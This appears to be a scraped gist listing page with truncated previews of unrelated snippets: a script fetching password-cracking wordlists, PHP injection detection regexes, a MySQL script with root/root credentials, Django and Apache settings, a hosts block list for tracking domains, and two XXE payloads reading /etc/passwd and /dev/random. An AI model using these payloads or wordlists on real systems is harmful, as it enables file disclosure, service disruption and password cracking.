This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Script by OliverK | |
#Downloads _every_ wordlist in the packet storm security site. | |
#April 18th, 2011 | |
# Updated Oct , 2th, 2012 | |
mkdir common | |
cd common | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
lang: | |
php: | |
- \\*\$_POST\[*.*\]. | |
- \$_GET\[*.*\]. | |
- .+\$_REQUEST\[*.*\]. | |
- .?\$_SESSION\[*.*\]. | |
- \\*\$_SERVER\[*.*\]. | |
- \\*\eval\(*.*\). | |
- \\*\include\(.*[$_POST|GET].*\). | |
asp: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Command Using : " | |
echo "# Database Create (c) or Database Delete (d)" | |
USER="root" # mysql user | |
PASS="root" # mysql user pw | |
read command |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Location "/django"> #/django virtualname ex:webpy to django | |
AddHandler cgi-script .py | |
SetHandler mod_python | |
PythonHandler django.core.handlers.modpython | |
SetEnv DJANGO_SETTINGS_MODULE webpy.settings | |
PythonDebug Off | |
PythonPath "['/var/www/webpy'] + sys.path" | |
</Location> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "webpy.settings") | |
# This application object is used by any WSGI server configured to use this | |
# file. This includes Django's development server, if the WSGI_APPLICATION | |
# setting points here. | |
from django.core.wsgi import get_wsgi_application | |
application = get_wsgi_application() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
find /var/log -type f -regex ".*\.gz$" | |
find /var/log -type f -regex ".*\.[0-9]$" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#<Phorm-sites> | |
127.0.0.1 a.oix.com | |
127.0.0.1 a.oix.net | |
127.0.0.1 a.openinternetexchange.com | |
127.0.0.1 a.phormlabs.com | |
127.0.0.1 a.webwise.com | |
127.0.0.1 a.webwise.net | |
127.0.0.1 b.oix.net | |
127.0.0.1 b.webwise.net | |
127.0.0.1 br.phorm.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Security | |
Header set X-Frame-Options: sameorigin | |
Header set X-XSS-Protection: "1; mode=block" | |
Header set X-WebKit-CSP: "default-src 'self'" | |
Header set X-Content-Type-Options: nosniff | |
Header set X-Permitted-Cross-Domain-Policies: "master-only" | |
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains" | |
Header unset ETag |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE description [ <!ELEMENT description ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>Test</title> | |
<link>za</link> | |
<description>A blog about things</description> | |
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
<item> |
OlderNewer